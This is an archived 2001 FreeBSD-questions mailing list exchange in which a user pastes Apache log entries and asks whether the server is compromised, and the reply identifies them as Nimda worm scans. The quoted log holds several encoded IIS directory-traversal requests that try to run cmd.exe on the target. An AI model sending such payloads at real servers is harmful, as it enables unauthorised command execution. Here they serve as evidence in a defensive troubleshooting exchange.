Skip site navigation (1)Skip section navigation (2)
Date:      Mon, 19 Nov 2001 13:04:01 -0800 (PST)
From:      mw@lanfear.com
To:        ann kok <annkok2001@yahoo.com>, freebsd-questions@FreeBSD.ORG
Subject:   Re:apache's log
Message-ID:  <20011119210401.49A1837B418@hub.freebsd.org>

next in thread | raw e-mail | index | archive | help

    this question is being asked about twice a day these days....  It's
the Nimda Virus.    The only bad thing is that it's filling up your
(and my) log files.

    marc.


> -----------------------------
> From:  ann kok <annkok2001@yahoo.com>
> To:  freebsd-questions@FreeBSD.ORG
> Subject:  apache's log
> Sent:  11/19/2001 12:58> 
> 
> 
> Hi all
> 
> I would like to know whether my web server is
> comprising by the following log message
> 
> How do I know it?
> 
> Thank you very much
> 
> 203.64.184.144 - - [20/Nov/2001:00:17:18 +0800] "GET
> /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0
> " 404 304
> 203.64.184.144 - - [20/Nov/2001:00:17:19 +0800] "GET
> /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0
> " 404 304
> 203.64.184.144 - - [20/Nov/2001:00:17:22 +0800] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0
> " 404 304
> 203.64.184.144 - - [20/Nov/2001:00:17:26 +0800] "GET
> /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
> HTTP/1.
> 0" 400 288
> 203.64.184.144 - - [20/Nov/2001:00:17:33 +0800] "GET
> /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0"
>  400 288
> 203.64.184.144 - - [20/Nov/2001:00:17:34 +0800] "GET
> /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
> HTTP/
> 1.0" 404 305
> 203.64.184.144 - - [20/Nov/2001:00:17:40 +0800] "GET
> /scripts/..%252f../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0"
>  404 305
> industry.ssu.ac.kr - - [20/Nov/2001:01:21:34 +0800]
> "-" 408 -
> industry.ssu.ac.kr - - [20/Nov/2001:01:22:58 +0800]
> "-" 408 -
> industry.ssu.ac.kr - - [20/Nov/2001:01:24:29 +0800]
> "-" 408 -
> industry.ssu.ac.kr - - [20/Nov/2001:01:25:59 +0800]
> "-" 408 -
> industry.ssu.ac.kr - - [20/Nov/2001:01:27:30 +0800]
> "-" 408 -
> industry.ssu.ac.kr - - [20/Nov/2001:01:29:00 +0800]
> "-" 408 -
> industry.ssu.ac.kr - - [20/Nov/2001:01:30:30 +0800]
> "-" 408 -
> industry.ssu.ac.kr - - [20/Nov/2001:01:32:01 +0800]
> "-" 408 -
> industry.ssu.ac.kr - - [20/Nov/2001:01:33:31 +0800]
> "-" 408 -
> industry.ssu.ac.kr - - [20/Nov/2001:01:35:02 +0800]
> "-" 408 -
> industry.ssu.ac.kr - - [20/Nov/2001:01:36:32 +0800]
> "-" 408 -
> industry.ssu.ac.kr - - [20/Nov/2001:01:38:03 +0800]
> "-" 408 -
> 
> __________________________________________________
> Do You Yahoo!?
> Find the one for you at Yahoo! Personals
> http://personals.yahoo.com
> 
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-questions" in the body of the message
> 


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-questions" in the body of the message




Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?20011119210401.49A1837B418>